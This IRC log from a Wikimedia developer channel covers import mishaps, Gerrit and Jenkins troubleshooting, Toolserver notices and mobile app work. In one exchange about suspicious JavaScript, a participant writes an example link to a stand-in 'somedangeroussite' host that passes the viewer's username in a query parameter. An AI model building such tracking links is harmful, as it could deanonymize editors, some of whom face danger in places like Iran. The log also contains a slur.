[03:35:33] So apparently transwiki importing doesn't tell you if there's already a title at the place where you're importing to? [03:35:42] I just made a mess at Meta-Wiki. [03:37:56] Susan: I think so, it just merges history [03:38:09] Pardon my French, [03:38:13] but that's pretty fucking retarded. [03:38:41] boxofjuice: It looks like the form doesn't even allow specifying a destination title. [03:38:49] Erm. [03:38:51] I can specify a namespace. [03:38:52] You sure? [03:38:57] Ok [03:39:06] How about sticking it in the userspace and then moving it to where we need? [03:39:07] destination namespace: all [03:39:42] I guess someone has made the determination that this feature is just functioning enough to not warrant being disabled. [03:40:47] huh: [22:38] boxofjuice: It looks like the form doesn't even allow specifying a destination title. [03:40:55] Which namespace would you like me to choose? [03:41:06] userspace [03:41:09] then we can move it [03:41:11] Knowing in advance that I'm not cleaning up whatever page this awful feature decides to trample. [03:41:23] We're gonna end up with a goddamn Meta-Wiki horcrux somewhere. [03:41:24] https://meta.wikimedia.org/wiki/User:Wikidata looks safe. [03:41:25] Susan: I'm pretty sure you can import to a different title [03:41:27] I've done it before [03:41:34] I'm lying. [03:41:38] I have such incentive and motive to lie. [03:41:41] There's no field for a title. [03:41:51] Susan: "Destination root page" [03:42:00] Set it to "Legoktm" [03:42:06] waaat [03:42:55] (Import log); 03:42 . . PiRSquared17 (Talk | contribs | block) transwikied User:Legoktm/Wikipedia:Wikidata ‎(1 revision from en:Wikipedia:Wikidata: per request) [03:42:59] https://test2.wikipedia.org/wiki/Special:RecentChanges [03:43:06] then move it [03:43:12] o.o [03:43:37] Oh, that's what I'm supposed to use? [03:44:09] Well, it's a good temporary name [03:44:37] 1. It's not in the userspace of some user called "Wikidata". 2. It preserves the original title. 3. 
Only 1 revision, this time? [03:47:09] Why aren't either of you admins on Meta-Wiki? [03:47:41] Susan: admin on a "content" project. [03:47:52] Well I guess I am, but huh isn't. [03:47:57] Susan: you know why [03:47:59] I hate everyone and everything. [03:48:03] I think it worked this time. [03:48:06] Without breaking everything. [03:49:24] https://gerrit.wikimedia.org/r/#/c/17809/ [03:49:26] Fascinating. [03:50:04] boxofjuice: now, move it to the page title you want [03:50:40] then Susan can import the other translations (to your userspace again), and I can fix it to use the new translation system [03:51:35] Susan: all of https://www.wikidata.org/wiki/Q4847210 needs to get imported [03:52:23] I guess someone has made the determination that this feature is just functioning enough to not warrant being disabled. https://bugzilla.wikimedia.org/show_bug.cgi?id=45823 [03:52:39] I just filed one. [03:52:42] Rawr. [03:53:14] I'm not a magician. [03:53:22] That looks like way more work than I signed up for. [03:54:23] Susan: I would do it, but I can't. I'm sure boxofjuice would say the same. :P [03:54:43] I have no idea why I can. [03:54:46] * boxofjuice would. [03:54:47] I can barely use the damn form. [03:54:50] Heh [03:54:51] just make sure you import only after boxofjuice has moved it [03:55:06] For example, move the French translation to [[Wikidata/Help/fr]] [03:55:07] If you can make a proper (text) list of the pages to import, I can do it later. [03:55:11] and the German one to [[Wikidata/Help/de]] [03:55:12] Or request on Meta-Wiki and some other admin will do it. [03:55:26] Susan: Sorry, you're already enlisted. [03:55:35] Besides, what are you going to do? Edit enwiki? [03:55:43] Do you know how hard it is to find a non-lazy Meta admin? [03:55:54] Keep looking. [03:55:54] Not very :P [03:56:08] What format do you want the list in Susan? [03:56:09] Just a list. 
[03:56:13] https://cs.wikipedia.org/wiki/Wikipedie:Wikidata [03:56:21] Or title\tnew title [03:56:29] Ok [03:56:30] 'cause I've gotta go through and import them individually. [03:56:33] Give me a sec [03:56:33] So ... [03:56:47] cs:Wikipedie:Wikidata --> User:Legoktm/Wikidata/de [03:56:49] Or cs [03:56:52] Or whatever. [03:56:57] So many ways to fuck this up. [03:57:21] I like how there's a namespace drop-down menu and a root page input, but not a place to just say "put this right here now." [03:57:31] Susan: actually, you can't do that [03:57:40] Great. [03:57:45] And even still, you can trample page histories. [03:57:56] You can do Legoktm/de/Wikipedia:Wikidata, though [03:58:02] I hope my annoyance is apparent. [03:58:14] Susan: that's why I've cleared out [[User:Legoktm/Wikipedia:Wikidata]] to a throwaway page [03:58:26] so as to not have junk in the page history of the import [03:58:41] I have no idea what you're saying. [03:58:46] (Moves); 03:57 . . PiRSquared17 (Talk | contribs) moved page User:Legoktm/Wikipedia:Wikidata to User:PiRSquared17/Left over page without leaving a redirect ‎(so as to not have junk in the page history) [03:59:07] so you can't trample the history of that one now [03:59:35] Fascinating. [03:59:41] You can move without leaving a redirect? [03:59:50] Because I'm a global sysop [04:00:00] abuse! [04:00:03] I often move junk into my userspace because it's easier than finding a meta admin [04:00:04] ok nearly done [04:00:11] Problem? [04:00:11] So much abuse. [04:01:04] boxofjuice: I just need langcode:namespace:title --> langcode. [04:01:10] I can figure the rest of it out. [04:01:10] ok [04:01:11] Maybe. [04:01:36] http://dpaste.de/0FH1E/raw/ [04:02:29] I love how people always complain about how Meta admins are abusive :P [04:02:54] Just wait till someone tries to clean up the "histmerge" Susan accidentally did today.
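An editorial aside: the "langcode:namespace:title --> langcode" list Susan asks for above is mechanical to produce. A hedged shell sketch — the two page names are examples from this log, and the User:Legoktm/&lt;langcode&gt; target is just one of the temporary conventions floated here, not the final titles:

```shell
# Sketch only: derive "old --> new" import mappings from lines of the form
# langcode:Namespace:Title. The destination convention is illustrative.
cat > /tmp/pages.txt <<'EOF'
cs:Wikipedie:Wikidata
fr:Wikipédia:Wikidata
EOF
while IFS= read -r page; do
  lang=${page%%:*}    # language code is the text before the first colon
  printf '%s --> User:Legoktm/%s\n' "$page" "$lang"
done < /tmp/pages.txt
```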
[04:03:06] I might attempt it when I become a sysop :P [04:03:26] boxofjuice: Are those all Wikipedias? [04:03:33] I'd assume so [04:03:39] Susan: Yes [04:03:59] Susan: make sure you use the "User" namespace, the root page "Legoktm/(langcode here)" [04:04:02] I think I can just use "Wikidata/Help" as a root page now, right? [04:04:12] With the (Main) namespace. [04:04:13] That would work [04:04:26] we'd still have to move it though (but I can handle that) [04:04:28] God help me. Okay, here we go. [04:05:39] Susan: just to be safe, include the language code in the root page name [04:05:52] Import failed: No pages to import. [04:06:04] ... [04:06:12] I tried with ... [04:06:18] el:Βικιπαίδεια:Wikidata [04:06:28] I wonder if "w" is really "en.wikipedia". [04:06:36] Susan: it is [04:06:40] Oh. [04:06:44] you need to change the language code in the drop down [04:06:44] Then how am I supposed to import these? [04:07:05] Special:Import is so messed up [04:07:05] commons, foundation, w, cs, fr, strategy [04:07:09] Those are my options. [04:07:15] Susan: import the French one please [04:07:27] and the Czech one :P [04:08:38] You know, it's just easier to copy and paste :P [04:09:10] [obviously with attribution] [04:09:35] Probably. [04:10:49] I meant to say done. [04:10:53] I did fr and cs. [04:10:55] I think. [04:11:26] Wait wat. [04:11:32] You can't import from anywhere? [04:11:36] No. [04:11:52] https://noc.wikimedia.org/conf/InitialiseSettings.php.txt [04:11:55] wgImportSources [04:11:56] boxofjuice: I can handle it for you. Just remember to give me a barnstar [04:12:03] 'metawiki' => array( 'commons', 'foundation', 'w', 'cs', 'fr', 'strategy' ), [04:12:21] huh: :DDDD [04:12:33] Copy and paste is fine, I guess. [04:12:34] This is so stupid, though. [04:12:45] Almost as bad as moving files from a local wiki to Commons. [04:12:46] Almost. 
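For context on why Special:Import only offered "commons, foundation, w, cs, fr, strategy": transwiki sources are whitelisted per wiki via wgImportSources in InitialiseSettings.php (the noc.wikimedia.org file linked above). A sketch using a local stand-in for that file — the metawiki line is quoted from the log; the grep is illustrative:

```shell
# Recreate the relevant fragment of InitialiseSettings.php locally
# (stand-in path; the real file is served at noc.wikimedia.org).
cat > /tmp/InitialiseSettings.php.txt <<'EOF'
'wgImportSources' => array(
    'metawiki' => array( 'commons', 'foundation', 'w', 'cs', 'fr', 'strategy' ),
),
EOF
# Pull out the import-source whitelist for metawiki.
grep -o "'metawiki' => array([^)]*)" /tmp/InitialiseSettings.php.txt
```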
[04:14:28] boxofjuice: give me a link to a place to report interwiki conflicts [04:14:36] the current one is enwiki-centric [04:14:46] https://www.wikidata.org/wiki/Wikidata:Interwiki_conflicts [04:14:48] Are you going to soft-redirect these local pages? [04:14:52] Or will there just be two copies now? [04:15:07] Susan: I think we should soft redirect them as soon as the meta copies are ready [04:15:14] So in like a few minutes [04:15:18] Okay. [04:15:22] I'm going to do something else now. [04:15:25] make that maybe an hour [04:15:53] ok [04:16:01] Susan: Clean up the mess you made? :P [04:16:33] Susan doesn't make messes, Only rainbows and butterflies >.> [04:17:35] boxofjuice: it's not worth it [04:17:51] I'll handle it if I become a local admin, or just ask a steward to do it [04:18:02] ok [04:18:02] :P [04:19:44] I'm working on the translation, then I'll import them and convert them [04:20:27] Susan: A week is too long. [04:20:56] Why's that? [04:21:04] Haven't most of these bots been running for years? [04:21:41] Except they weren't fighting humans [04:21:48] Plus [04:21:52] If they use the API [04:22:00] They can't tell the difference between Wikidata + local links [04:23:53] I posted on the talk page. [04:27:10] Do OTRS volunteers have to be identified? [04:27:22] No [04:27:29] Fascinating. [04:27:38] Not unless they're in a queue like oversight-wp-en [04:27:44] In which case they need to ID for oversight [04:28:37] Okay. [04:28:42] https://meta.wikimedia.org/w/index.php?title=Non-disclosure_agreements&diff=5302620&oldid=5302202 [04:34:16] Oh right [04:34:28] At one time [04:34:31] OTRS volunteers were told to identify [04:34:39] But apparently that policy lived for a very short time [04:34:44] And it was 16+ identification. [04:34:50] RD would know more. [05:14:46] what's the equivalent of 'mwscript eval.php enwiki' that would run a php file? mwscript foo.php enwiki looks for foo.php in maintenance; if i specify the complete path it barfs. 
[05:15:09] piping the script into eval.php doesn't work because it evaluates each line separately [05:15:29] ('barf' is a technical term.) [05:18:20] can't you remove all the line breaks so the script is in one line? [05:19:03] yes, but that's a bit yucky [05:22:19] ori-l: require() ? [05:22:22] (wild guess) [05:22:36] jeremyb_: heh, obvious and clever. thanks. [05:22:49] that's forehead-slap worthy i think [05:37:40] * jeremyb_ slaps ori-l with a large trout [05:37:48] thanks, that's sobering [05:38:32] off to sleep. or something. good night! [05:47:12] good night [08:16:17] From my CS project: [08:16:19] "Wikipedia and its related sites are based on the Wikimedia Architecture, which uses a LAMP platform based on GNU/Linux, Apache, MySQL, and PHP, using multiple, redundant web servers behind a load-balancing virtual router for reliability and performance." [08:16:24] The understatement is killing e :P [08:16:27] s/e/me/ [08:16:52] "Wikimedia Architecture" [08:17:00] domas is cited in the project abstract, though :P [08:37:08] FastLizard4: loldomas [08:37:16] ikr [08:39:28] "While LAMP works fairly well for Wikipedia..." [08:39:31] Only fairly well? :P [08:39:38] I thought it worked pretty damn well [08:39:55] Until the cooling in pmtpa fails [08:39:56] :P [10:01:11] emergency security issue. I need a developer to take a look at some code [10:07:06] anyone [10:26:22] Mardetanha: Is it love on the wikimedia cluster?
[10:26:43] *live [10:26:45] p858snake|l: no, it is about suspicious js [10:27:39] Mardetanha: if it's to do with a wikimedia or mediawiki project, you can file a bug on our bugzilla (https://bugzilla.wikimedia.org) and mark it "Security", and only the security team can see that [10:28:48] p858snake|l: it should not be discussed openly, i prefer to discuss it privately, but i can say, it seems a user is trying to get users' information by pointing them to his own website [10:28:49] and in Iran this could be so dangerous [10:29:25] Mardetanha: anything in the security section is private to the security team [10:29:54] p858snake|l: good [10:29:57] is that website trying to look as if they were still at wikipedia? [10:30:43] Platonides: no, but i assume it could identify users with their associated ips [10:36:02] only if he knows when that wiki username followed his link [10:36:38] Platonides: it is trying to load a wikidata page, [10:36:48] it is possible [10:40:16] Mardetanha, it is not possible for a remote website to know the username you are logged in as [10:40:20] Silke_WMDE: great email, wonderful :) I think it's also worth copying to Meta, [[Future of Toolserver/Request for help]] or whatever, so that end users know what's happening too. :) [10:40:31] (or if you found a way, it's an important bug) [10:40:55] Nemo_bis: good idea, I'll do that [10:41:22] Platonides: writing a report in bugzilla [11:17:13] Silke_WMDE: thanks for the email! [11:17:36] saper: :) [11:18:28] Nemo_bis: I added the text of the e-mail here http://meta.wikimedia.org/wiki/Future_of_Toolserver#Request_for_help_to_all_toolserver_users [11:20:30] looks like work both on meta and on mediawiki.org :) [11:20:44] Silke_WMDE: great [11:21:25] these two wikis are confusing... meta vs. mediawiki...
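Returning to ori-l's earlier mwscript question: eval.php reads one line at a time, which is why jeremyb_'s require() suggestion works — the interpreter receives a single self-contained statement that loads the whole file. A rough analogy in plain shell (shell's "." playing the role of PHP's require(); the path and script contents are invented):

```shell
# A multi-line script: its lines are not independently evaluable.
cat > /tmp/myscript.sh <<'EOF'
if true
then
  result="it worked"
fi
EOF

# Line-at-a-time evaluation (what eval.php effectively does) breaks:
# 3 of the 4 lines are incomplete constructs on their own.
fails=0
while IFS= read -r line; do
  ( eval "$line" ) 2>/dev/null || fails=$((fails + 1))
done < /tmp/myscript.sh
echo "lines that failed on their own: $fails"

# The require()-style workaround: one statement that pulls in the whole file.
. /tmp/myscript.sh
echo "$result"
```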
[11:22:05] Platonides: if they used a wikilink, they could include a {{currentuser}} parserfunction or something if they were that desperate (but i think our cache would keep that from working) [http://example.org/somedangeroussite/index.html?referrer={{{currentuser}}} Google Search!] [11:22:54] Silke_WMDE: yeah in the old times (pre-Toolserver.org wiki) TS stuff used to be on meta [11:28:44] Silke_WMDE: wikified and added to the sitenotice and Wikimedia Forum [11:29:08] yes, Meta is the most logical place for Toolserver stuff, but WMF prefers to use mediawiki.org for Labs stuff so things are stretched [11:30:45] Silke_WMDE: can I also forward it to the mailing lists? [11:32:04] Nemo_bis: thanks! and sure you can forward it. I sent it to labs-l and toolserver-l (and I think toolserver-announce) a little while ago but sending it again won't harm. :) Feel free to spread the word! [11:32:11] and thanks for your help! [11:39:30] XD "to wikify" [11:52:19] :( Thehelpfulone, why does mailman now boycott my announce crossposting? [11:52:38] Request for help to all Toolserver users: list the tools you want to keep Is being held until the list moderator can review it for approval. The reason it is being held: Too many recipients to the message [11:53:04] have we crossed the cross-posting limit mailman likes with the 2 new sister projects or was the limit lowered [14:38:54] Hi :). Where exactly is the code of the Android mobile client? [14:40:45] FastLizard4|zZzZ: errr, link? [14:41:16] fale: hey! The app? [14:41:21] fale: or the commons app?
[14:41:38] fale: https://github.com/wikimedia/WikipediaMobile or https://github.com/wikimedia/android-commons [14:41:43] fale: also there is #wikimedia-mobile :) [14:43:02] @YuviPanda thanks :) I was looking for WikipediaMobile and I had no idea about the existence of android-commons ;) [14:43:23] fale: :) active development on WikipediaMobile has ceased for now, but commons is going full on ahead [14:43:40] Mardetanha: did you file the bug? can i get CC? [14:44:03] jeremyb_: on the phone [14:44:05] YuviPanda: why ceased? No one is interested anymore or for other reasons? [14:44:12] k [14:44:19] fale: I was the only one majorly working on it, and I'm now working on android-commons [14:44:28] fale: plus we've had very bad experiences using phonegap [14:44:47] commons is not phonegap? [14:45:03] jeremyb_: nope [14:45:04] it is natvie [14:45:06] *native [14:45:08] YuviPanda: I'm interested in working on a Wikipedia Mobile app for android... I'm fine even with native code [14:45:11] and there's an iOS version [14:45:29] fale: yes! That would be nice - we were going to make a native version at some point [14:45:59] YuviPanda: I can start it and hope others will help too? :D [14:46:14] fale: sure! There is the mobile-l mailing list, so please announce there :) [14:47:38] YuviPanda: perfect I'm going to announce it and start working :) [14:49:15] YuviPanda: to push the app to the store, I'll have to ask someone in WMF or you? [14:49:34] we still haven't worked that out [14:49:38] but am sure we can figure something out on that [14:50:01] YuviPanda: well... at the moment who is working? [14:50:05] *how [14:50:44] fale: well, at the moment the only devs on android stuff has been mre [14:50:45] *me [14:50:48] and i have keys to push to the store [14:51:15] YuviPanda: so, when the app is ready I can ask you, I suppose?
[14:51:35] it is supposed to be a community process, but as I said, don't worry about it [14:51:42] we'll figure it out [14:51:49] Oki :) [15:06:40] sorry, "Sam Reed" in now online? [15:07:01] Wim_b, see Reedy [15:07:54] thanks [15:23:35] ciao Wim_b [15:23:46] e ciao fale [15:24:00] invasione italiana oggi, vedo [15:25:18] Wim_b or you can just type @notify Reedy and our bot will ping you when he's back :P in case Reedy wouldn't [15:25:44] ciano Nemo_bis :) [15:26:39] or just use memoserve (/msg memoserv help) :) [15:31:18] p858snake|l that doesn't ping you back and target users (including me) mostly never read it :P [15:31:47] Special:Email is better IMHO [15:31:58] or whatever the link is [15:32:07] errr, what about user talk page? [15:32:16] petan, memoserv sends you a notice when you reconnect [15:32:21] plus, I think it also emails you [15:32:53] Platonides no it doesn't e-mail or it didn't... regarding notices, they are easy to overlook in all that messages you get on reconnect [15:32:58] it does, if you have a email address attached [15:33:07] you might also need to enable it [15:33:09] I have email attached because otherwise I couldn't register [15:33:15] maybe [15:33:18] let me checkl [15:33:29] ciao Nemo_bis io sono entrato per chiedere scusa per una figura di merda immane :/ [15:33:49] don't see that option in there :/ [15:34:24] -NickServ- Flags : HideMail, EMailMemos, Private [15:34:27] its a NS flag [15:34:31] aha [15:35:04] Wim_b: hai chiesto una configuratione sbagliata e ucciso Wikizionario? :D [15:35:09] petan: thanks, I wrote in query. sooner or later will read, it was just a "sorry" :) [15:36:02] Nemo_bis: no, l'admin storico di wikivoyage mi ha dato un'informazione sbagliata e mi ha fatto aprire un bug mezzo errato, oltretutto, mi sono anche mezzo incavolato quando mi hanno dato torto, invece ce lo avevo... 
[15:36:44] https://it.wikivoyage.org/w/index.php?title=Discussioni_utente:Wim_b&diff=next&oldid=205679 <- here, as far as I can tell not even the admin could see the "!", or am I wrong? [15:37:44] so it would seem [15:37:51] it.voy is a bit unlucky [15:38:06] and now I'm also a bit annoyed, because it's fine to be the public face, but at least don't make me look like a fool... [15:39:35] that's exactly why I wanted to apologize to the dev, because he had actually told me it was active, and he even asked me whether I meant to change the settings for autoconfirmed users too. cocky me, I even said "no, the problem is that the "!" aren't visible even on IP edits" -.- [15:41:26] Wim_b: but don't worry too much, 75% of configuration requests contain glaring errors [15:41:37] that's why they sit rotting for months, on average :D [15:41:49] Nemo_bis: a bit unlucky how? (because I'm not opening any more bugs, and somebody else from the project had better register on bugzilla, because if they wait for me... [15:42:24] totally agreed, but if others open them that's fine; being cast as the guy who doesn't see the "!" that are there doesn't seem right to me :p [17:36:26] robla: it's always fun when a long uncancelable disk repair check is running when you don't expect it [17:37:04] * Aaron|home wonders if that was another result of dealing with that horribly broken hp printer installer [17:43:09] Aaron|home: isn't it usually the result of canceling it every time until it becomes uncancelable?
:p [17:44:07] I could have cancelled it but the window for that closed since I wasn't in front of the screen at that time [17:44:44] speaking of uncancelable, the hp installer had to be deleted or it would keep popping up in startup, and "cancel" made it restart [17:44:57] lol [17:45:03] and continuing made it give an error, restart the computer, and rinse and repeat [17:45:12] there were like 4-5 layers of serious bugs [17:45:38] I mean if it was just the "setup failed" error, it wouldn't be so bad [17:46:34] one time the installer locked up the PC and a hard restart was needed [17:46:34] Aaron|home: might be an environmentalist punishment for consuming paper [17:46:39] maybe that caused the disk problems [17:46:55] I rarely use it though, heh [17:47:07] all I wanted to do was setup the wireless mode :) [17:47:09] hmm "Labs page Deployments has been changed", should wikitech have wgsitename fixed? [17:47:34] I think I'd hardly manager to use notepad on windows, nowadays [17:47:38] *manage [18:10:09] wc [18:10:13] wc [18:13:13] wc -l [18:13:16] ;) [18:15:39] Am I right in presuming that the "slow query log" is something that only Ops can access? [18:17:52] hey Jeff_Green -- hope you're doing well today. Am I right in presuming that the "slow query log" is something that only Ops can access? [18:17:59] sumanah: it depends on the definition of ops [18:18:14] any "shell user" can access it, AFAIK [18:18:31] http://wikitech.wikimedia.org/wiki/Logs [18:18:50] I tried searching wikitech.wikimedia.org and didn't see a reference to it [18:19:08] where did you see that? [18:19:27] sumanah: you're talking about mysql's slow query log? 
that's a file local to the db, requires shell access to the db server [18:19:34] Yes [18:19:37] asher has setup ishmael, a web tool to analyze slow queries [18:19:52] but because slow queries can contain private data, this is limited to WMF staff only [18:19:57] I hear people talking about "slow query log" as one of the things we look at to figure out what's not performing well so we can optimize it [18:20:04] until we have a "has signed NDA" group in LDAP [18:20:31] which last time I heard it was messy because of non-technical issues [18:21:04] Nemo_bis: within https://wikitech.wikimedia.org/wiki/Logs are you saying that I should look at "slow-parse.log" for similar information? [18:21:12] https://ishmael.wikimedia.org/ is that tool [18:21:39] okay. [18:21:56] ah neat [18:30:00] sumanah: yes, or the point where it says that it's on fluorine [18:33:31] hi! [18:33:46] hi domas [18:34:04] Jeff_Green: when people talk about "the slow query log" do they mean slow-parse.log? [18:34:21] i don't. :-P [18:34:23] sumanah: no; slow query log shows slow database queries [18:34:36] slow-parse.log shows articles/templates that took the parser a long time to parse [18:34:41] ok. so it's not listed on https://wikitech.wikimedia.org/wiki/Logs - is that right? [18:34:44] http://dev.mysql.com/doc/refman/5.0/en/slow-query-log.html [18:35:04] Nemo_bis: I think you confused me. :( [18:35:18] ah well. [18:36:05] would anyone be terribly offended if pgehres and I did a quick cluster deploy to fix an annoying centralnotice bug? [18:36:35] mwalker: go for it [18:36:55] domas: Any suggestions on how to improve this query to get rid of the filesort/temporary? http://p.defau.lt/?aMLMdUsjWcI2mlINoiZd4Q [18:37:38] sumanah: you might be interested in https://gerrit.wikimedia.org/r/#/c/49678/ [18:37:49] looking [18:38:02] reedy: watchlist query? 
[18:38:16] oh dear [18:38:17] Yeah [18:38:26] hehe [18:38:30] the thought there was to make the slow parse log publicly available, so that volunteers and community members find out about egregiously bad templates, and also monitor on an ongoing basis performance improvements brought on by scribunto [18:38:34] pgehres: cool -- so pull master of centralnotice; meta is currently on wmf11 [18:38:37] you know that watchlist query change was my biggest improvement ever to wikipedia?!!? [18:38:41] thats how I started [18:39:01] reedy: this is my favorite interview question btw, how to improve watchlist query ;-D [18:39:01] sumanah: but the slow parse log also contains data from private wikis, so there's a need for some filtering [18:39:03] is there any source on what work is needed where in the ops scope? [18:39:05] yeah [18:39:15] We all know the answer is to drop the table [18:39:20] qgil_: ^ question from matanya [18:40:59] matanya, currently I'd recommend to start with http://www.mediawiki.org/wiki/Wikimedia_Labs#TODO and Ryan_Lane as point of contact [18:41:15] ori-away: sumanah yeah, we recently had a bit of a blowup about log data being published for privacy concerns. [18:41:16] Thanks qgil_ [18:41:25] reedy: I don't like join buffer tho [18:41:29] erik specifically asked to have things run by him if log data is going to be published [18:41:40] I wonder what it means there [18:41:42] I'd strongly recommend getting his signoff before publishing anything [18:41:46] mwalker: cool, only meta is affected? [18:41:54] matanya: we have a number of projects to participate in [18:42:06] matanya: you should join #wikimedia-labs [18:42:09] matanya, fwiw in my backlog: 2013-01-08: How to get volunteers involved in Operations / sysadmin tasks. :) http://www.mediawiki.org/wiki/User:Qgil [18:42:29] matanya, feedback and help from prospective volunteers is *very* helpful to improve the current situation [18:43:01] thanks both. 
BTW, Ryan_Lane your talk at puppet conf pushed me to lend a hand [18:43:07] :) [18:43:09] ah, great [18:43:10] :) [18:44:07] pgehres: yep; only meta [18:44:20] hashar- I have a few Jenkins questions for you (no rush though). [18:44:20] hashar- In https://integration.mediawiki.org/ci/job/mwext-Scribunto-testextensions-master/80/console it looks like Jenkins tested 52572 rather than 52569 (the fatal error at the bottom refers to code added in 52572; the others are legit). [18:44:20] hashar- In https://integration.mediawiki.org/ci/job/php-luasandbox-build/25/console one of the unit tests failed but Jenkins reported success. It would also be helpful if Jenkins could include the contents of tests/*.log (which are created only on test failure). [18:46:05] reedy: SQL/relational algebra cannot express the problem that well [18:46:26] reedy: I love explaining how to approach this problem at huge scale [18:46:38] reedy: but it takes an hour :-) [18:46:54] reedy: short answer is "merge individual change streams" [18:47:15] add word "smart" somewhere in there [18:47:20] and you will get optimal algorithm [18:47:28] if you add "adaptive", it can be a proper paper [18:48:06] mwalker: gerrit is taking forever ... [18:48:28] I know! it's terribly annoying today [18:49:04] what are rc_types 3 and 5? [18:51:50] ^demon: is manganese doing okay? gerrit seems to be iffy this am [18:51:58] <^demon> wfm... [18:52:00] <^demon> I'll check tho [18:52:05] http://ganglia.wikimedia.org/latest/graph_all_periods.php?h=manganese.wikimedia.org&m=cpu_report&r=hour&s=descending&hc=4&mc=2&st=1362682239&g=cpu_report&z=large&c=Miscellaneous%20eqiad [18:52:18] https://meta.wikimedia.org/wiki/Metrics_and_activities_meetings/2013-03-07 meeting in 10 min [18:52:27] my "git submodule update --init --recursive" is just hanging [18:53:00] Reedy, you can remove it by removing the ORDER BY :P [18:53:57] <^demon> pgehres: ouch.
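A toy illustration of domas's "merge individual change streams" answer: if each watched page's revision timestamps are already stored in order, the combined watchlist ordering falls out of a k-way merge (sort -m below) with no global sort — which is what the filesort in Reedy's EXPLAIN would otherwise do. Filenames and timestamps are made up:

```shell
# Two per-page "change streams", each already sorted oldest-to-newest.
printf '2013-01-01\n2013-03-05\n' > /tmp/stream_pageA
printf '2013-02-10\n2013-03-07\n' > /tmp/stream_pageB
# sort -m merges already-sorted inputs without re-sorting them;
# the tail is the "most recent changes" slice a watchlist wants.
sort -m /tmp/stream_pageA /tmp/stream_pageB | tail -n 2
```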
[18:54:26] sumanah: i like that we have the metrics meetings on youtube now, i can watch them while still working at my desk :D [18:54:57] <^demon> pgehres: 14583 gerrit2 20 0 7061m 2.7g 5708 S 599 34.6 5471:14 java [18:55:13] :( harder to ask questions though brion [18:55:15] oh java [18:55:20] either asking you or having you ask [18:57:55] thanks ori-away [18:58:27] <^demon> pgehres: So, gerrit flipped out a little while ago and restarted itself. [18:58:51] <^demon> The cpu spike we're seeing is a) restart procedures and b) all the queued things trying to catch up (plus normal traffic) [18:59:09] ^demon: fun times with open source software [18:59:14] <^demon> Indeed! [19:00:08] <^demon> There's 7 upload-packs in the queue now, so yeah...curious what'll happen once that's all caught up. [19:00:44] ^demon: should I just punt on this deployment until gerrit catches up? [19:00:52] domas: meh [19:00:54] <^demon> Eh, it's prolly fine. [19:01:00] you say that ... [19:01:07] but I can't get the branch I need :-) [19:01:33] oooh, there it goes [19:02:56] domas: I can't see a way around sorting without massive data duplication [19:03:18] * Aaron|home wonders what the best trade offs are [19:05:09] well that or scanning a large number of rows of course [19:07:26] Remove watchlists [19:08:46] * Aaron|home pushes Reedy back into gerrit [19:13:12] anomie: regarding luasandbox test failing and the build being a success ( https://integration.mediawiki.org/ci/job/php-luasandbox-build/25/console ) I guess the 'make test' does not report an exit code > 0 [19:13:35] mwalker: out on testwiki [19:13:44] pgehres: cool [19:13:57] hashar- You're probably right.
You could just check for those tests/*.log files, probably [19:14:28] <^demon> pgehres: Everything seems pretty much back to normal by now :) [19:14:52] ^demon: awesome, but i am done with the gerrit parts of the deploy [19:15:06] <^demon> Yeah, just fyi :p [19:15:07] unless mwalker needs another patchset [19:15:18] anomie: I guess 'make test' reports a success because it successfully sends the bug report to PHP QA [19:15:29] pgehres: nope; it's working [19:15:37] continue as planned! [19:15:39] mwalker: awesome, i will sync [19:15:42] <^demon> pgehres: If you're curious, `ssh -p 29418 gerrit.wikimedia.org gerrit show-queue` shows you fun things :) [19:17:13] mwalker: syncing [19:17:17] anomie: Jenkins runs : phpize && ./configure && make && make test [19:17:37] anomie: so if you find out the magic to have 'make test' stop reporting and exit 1, that will make the job fail :-) [19:17:45] mwalker: done [19:17:55] whoot whoot [19:26:40] <^demon> hashar, anomie: It seems php's make test is stupid, and returns 0 even on failure. [19:26:45] hashar- make test && if tail -vn +1 tests/*.log 2>/dev/null; then false; else true; fi ? [19:26:51] <^demon> Setting TEST_PHP_ARGS to -q should skip the question entirely. [19:27:07] <^demon> (The do you want to send crap to php-qa) [19:27:10] anomie: a bit hacky [19:27:15] ahh [19:27:19] env variable would be nice [19:27:23] so just do something like: [19:27:29] TEST_PHP_ARGS="-q" make test [19:27:30] ? [19:28:06] <^demon> That'll at least skip the "do you want to send results" crap. [19:28:13] <^demon> But I think it's still dumb and exits 0. [19:31:33] <^demon> Yeah, make test is stupid. [19:31:55] <^demon> anomie's idea should work. [19:32:03] I suppose TEST_PHP_ARGS="-q --show-diff" might be good enough to show the actual test results. [19:32:27] Then you might be able to just do [ -e tests/*.log ] after the make test [19:32:57] err. [ ! -e tests/*.log ] [19:34:17] hmm.
PHP bug https://bugs.php.net/bug.php?id=60285 is closed, but no mention that it was actually fixed [19:35:13] petan: I added you to the groupo [19:35:14] *group [19:35:18] can you test this? [19:35:27] https://wikitech.wikimedia.org/w/index.php?title=Special:Ask&q=[[Category%3AShell+Access+Requests]][[Is+Completed%3A%3Afalse]]&p=format%3Dtemplate%2Flink%3Dall%2Fheaders%3Dshow%2Fsearchlabel%3DOutstanding-20Requests%2Fdefault%3D%28no-20outstanding-20requests%29%2Ftemplate%3DShell-20Request%2Fintrotemplate%3DShell-20Request-2Fhead%2Foutrotemplate%3DShell-20Request-2Ffoot&po=%3FShell+Request+User+Name%0A%3FShell+Justification%0A%3FModificati [19:35:34] ewwwww that's such an ugly query [19:35:44] petan: https://wikitech.wikimedia.org/wiki/Special:UserRights/Wooster [19:35:52] you should be able to modify that [19:37:03] hm. wrong channel [19:38:11] Ryan_Lane hi sorry my client was off [19:38:32] yes I see that - not revokable though but I think that's ok [19:39:04] not being able to revoke is actually good :) [19:39:09] is there some page or bugzilla I should watch for these requests so that I can handle them? [19:39:18] if you revoke shell it'll remove them from everything [19:39:25] aw [19:39:27] right [19:39:39] ah. this is listed for cloudadmins [19:39:42] hm [19:39:58] * Ryan_Lane really doesn't want to add another sidebar [19:40:02] I guess I will, though [19:40:06] heh [19:40:35] oh. it won't add it for most people anyway [19:40:45] not sure what you mean now [19:41:09] hashar- It looks like in PHP's git master, you can do "REPORT_EXIT_STATUS=1 make test" to get it to exit properly. But I don't know what version of PHP that might appear in. [19:41:24] petan: hard refresh wikitech [19:41:30] petan: there's a new sidebar [19:41:34] okay [19:41:41] whoops [19:41:45] one sec. I broke that [19:41:46] I see it [19:41:48] heh [19:42:04] ok. 
now refresh :)
[19:42:25] ok
[19:42:27] add woosters into shell, so I know this is working properly
[19:42:38] thanks, and one more thing
[19:42:47] oh. this process sucks a little right now
[19:42:49] anomie: git log -SREPORT_EXIT_STATUS
